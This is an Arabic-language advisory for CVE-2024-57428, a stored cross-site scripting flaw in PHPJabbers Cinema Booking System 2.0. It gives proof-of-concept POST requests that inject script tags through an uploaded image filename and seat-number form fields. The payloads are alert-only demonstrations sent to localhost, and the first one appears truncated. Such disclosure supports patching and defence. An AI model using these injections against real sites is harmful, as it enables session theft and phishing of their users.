
CVE-2024-57428: نظام حجز السينما PHPJabbers الإصدار 2.0 يعاني من ثغرة XSS مخزنة، مما يتيح حقن JavaScript دائم لهجمات التصيد والبرامج الضارة.
ثغرة برمجة نصية عبر المواقع مخزنة (XSS) في نظام حجز السينما PHPJabbers الإصدار 2.0 موجودة بسبب إدخال غير منقى في حقول رفع الملفات (event_img, seat_maps) وتكوينات أرقام المقاعد (number[new_X] في pjActionCreate). يمكن للمهاجمين حقن جافا سكريبت دائمة، مما يؤدي إلى التصيد الاحتيالي، وحقن البرامج الضارة، واختطاف الجلسات.
المعامل الضعيف: event_img و اسم ملف seat_maps
ثغرة XSS المخزنة أشد خطورة من XSS الانعكاسية، لأنها تؤثر على جميع المستخدمين الذين يصلون إلى المحتوى المحقون. يمكن استغلالها لهجمات تصيد احتيالي دائمة، وسرقة الجلسات، أو حقن برامج ضارة على قاعدة واسعة من المستخدمين.
الحمولة: \">
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]
------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg
الحمولة: "><script>alert(x)</script>
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"
11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"
1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"
2"><script>alert(2)</script>2